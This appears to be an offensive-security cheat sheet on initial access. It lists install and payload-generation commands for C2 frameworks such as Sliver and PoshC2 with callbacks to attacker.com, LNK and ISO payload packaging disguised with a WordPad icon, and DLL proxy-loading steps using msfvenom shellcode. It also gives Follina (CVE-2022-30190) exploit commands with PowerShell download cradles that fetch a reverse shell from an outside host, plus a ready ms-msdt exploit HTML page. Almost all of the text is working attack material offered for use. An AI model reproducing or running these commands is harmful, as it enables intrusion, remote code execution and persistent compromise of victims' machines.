Initial Access
01. C2 Frameworks
01.1 Silver
## ------------------| Setup
sudo apt install git mingw-w64
curl https://sliver.sh/install|sudo bash
systemctl status sliver
## ------------------| Create Payload (Session Mode)
### from mTLS
sliver > generate --mtls attacker.com:443 --save payload.exe
### from WireGuard
sliver > generate --wg attacker.com:443 --save payload.exe
### from HTTP
sliver > generate --http attacker.com:443 --save payload.exe
### from DNS
sliver > generate --dns attacker.com:443 --save payload.exe
## ------------------| Create Payload (Beacon Mode)
sliver > generate beacon --mtls attacker.com:443 --save beacon.exe
## ------------------| Genarate for target OS
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac
## ------------------| Install
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash
## ------------------| Create a new project
posh-project -n <project-name>
## ------------------| Projects can be switched to or listed using this script
[*] Usage: posh-project -n <new-project-name>
[*] Usage: posh-project -s <project-to-switch-to>
[*] Usage: posh-project -l (lists projects)
[*] Usage: posh-project -d <project-to-delete>
[*] Usage: posh-project -c (shows current project)
## ------------------| Edit the configuration for your project
posh-config
## ------------------| Launch the PoshC2 server
posh-server
## ------------------| Alternatively start it as a service
posh-service
## ------------------| Install
git clone --recurse-submodules https://github.com/cobbr/Covenant && cd Covenant/Covenant
dotnet run
## ------------------| Install
git clone https://github.com/ahmedkhlief/Ninja/ && cd Ninja
chmod +x ./install.sh
sudo ./install.sh
python3 start_campaign.py
python3 Ninja.py
## ------------------| Folder Structure
### agents/ : contains all the raw agents required by Ninja.
### core/ : contains all the core scripts to run Ninja.
### DA/ : Defense Analysis script will write its output here.
### downloads/ : all the downloaded files from victim will be here.
### file/ : files to be uploaded to the victim.
### images/ : screenshots will be uploaded here .
### kerberoast/ : kerberoast module will write its output here.
### lib/ : include library used by Ninja C2.
### Modules/ : Powershell modules can be loaded to the victim .
### payloads/ : payloads ready tp be used in the campaign.
### ninja.py : c2 main script.
### start_campaign.py : python script to intialize the configuration for campaign.
### links.txt : file containing words to be used in the call back links
### install.sh : bash script to install the required
### c2-logs.txt : log all commands with its result
## ------------------| Install
git clone https://github.com/p3nt4/Nuages
cd Nuages/Server/
bash setup.sh
bash start.sh
02. Delivery and Execution
02.1 Genarate Payloads
Create LNK file
## ------------------| Setup
$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\<filepath>\<filename>.lnk") # Changeme!
$link.windowstyle = "7"
$link.targetpath = "%windir%/system32/cmd.exe"
$link.iconlocation = "C:\Program Files (x86)\Windows NT\Accessories\WordPad.exe"
$link.arguments = "/c start OneDriveStandaloneUpdater.exe"
$link.save()
Packed as ISO
git clone https://github.com/mgeeky/PackMyPayload && cd PackMyPayload
pip3 install -r requirements.txt
python PackMyPayload.py c:\<filepath>\ c:\<filepath>\<filename>.iso --out-format iso --hide file1,file2
02.2 DLL Proxy Loading
## ------------------| Find the legitimate programe to hijack the DLL
## Find better binary from https://ninite.com
## For example i will use OneDriveStandaloneUpdater.exe as below
copy %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe OneDriveUpdater.exe
## for Bit32
copy "C:\Windows\System32\version.dll" version-org.dll
## for bit64
copy "C:\Windows\SysWOW64\version.dll" version-org.dll
## ------------------| Crafting the proxy payload
### Create simple payload bin
msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Proxy Loading worked" -f raw > shellcode.bin
### Download the below repo and complie it.
https://github.com/Flangvik/SharpDllProxy
### Copy the version-org.dll and shellcode.bin inside to the SharpDllProxy
.\SharpDllProxy.exe --dll version-org.dll --payload shellcode.bin
### Open visual studio and Create a new project -> Select C++ --> βDynamic-link Library (DLL)β template
### The name of the solution should match the original DLL name
### Copy and paste the full content of output_<DLLNAME>/<DLLNAME>_pragma.c in to the cpp file
## https://h4rithd.com/blog/dll-proxy-loading/index.html
03. Other
03.1 MS-MSDT Follina [CVE-2022-30190]
Exploit
## ------------------| JohnHammond
git clone https://github.com/JohnHammond/msdt-follina
python3 follina.py -o exploit.doc -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
## ------------------| chvancooten
git clone git clone https://github.com/chvancooten/follina.py
## Execute a local binary
python3 follina.py -t docx -m binary -b \windows\system32\calc.exe
## On linux you may have to escape backslashes
python3 follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe
## RevShell
python3 follina.py -t rtf -m command -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
Scheme
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>
</body>
</html>
Last updated